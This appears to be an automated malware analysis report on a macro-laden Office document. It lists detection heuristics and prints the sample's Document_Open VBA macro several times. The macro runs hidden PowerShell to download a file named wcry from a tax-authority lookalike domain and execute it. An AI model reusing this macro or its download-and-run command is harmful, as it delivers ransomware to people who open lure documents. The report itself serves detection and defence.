Malicious Office (OLE) — malware analysis report

Heuristics 12

• ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
• VBA macros detected medium 5 related findings OLE_VBA_MACROS
  Document contains VBA macro code
• WScript.Shell usage critical OLE_VBA_WSCRIPT
  WScript.Shell usage
  Matched line in script

  Sub Document_Open()
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run ("powershell.exe -windowstyle hidden -command ""Invoke-Webrequest -UserAgent 'Ransomware Download' -Uri https://franchise-tax-board.us/wcry.jpg -outfile $env:Temp\wcry.exe; Start-Process $env:Temp\wcry.exe")

• PowerShell reference in VBA critical OLE_VBA_PS
  PowerShell reference in VBA
  Matched line in script

  Set objShell = CreateObject("Wscript.shell")
  objShell.Run ("powershell.exe -windowstyle hidden -command ""Invoke-Webrequest -UserAgent 'Ransomware Download' -Uri https://franchise-tax-board.us/wcry.jpg -outfile $env:Temp\wcry.exe; Start-Process $env:Temp\wcry.exe")
  End Sub

• CreateObject call high OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script

  Sub Document_Open()
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run ("powershell.exe -windowstyle hidden -command ""Invoke-Webrequest -UserAgent 'Ransomware Download' -Uri https://franchise-tax-board.us/wcry.jpg -outfile $env:Temp\wcry.exe; Start-Process $env:Temp\wcry.exe")

• VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
• Document_Open macro low OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script

  Attribute VB_Customizable = True
  Sub Document_Open()
  Set objShell = CreateObject("Wscript.shell")

• Reference to PowerShell high SC_STR_POWERSHELL
  Reference to PowerShell
• Reference to Windows Script Host high SC_STR_WSCRIPT
  Reference to Windows Script Host
• LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
  Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
• Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://mail.franchise-tax-board.us In document text (OLE body)

  • https://franchise-tax-board.us/wcry.jpgIn document text (OLE body)
  • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
  • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
  • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Open this report in the interactive analyzer, or submit your own file for analysis.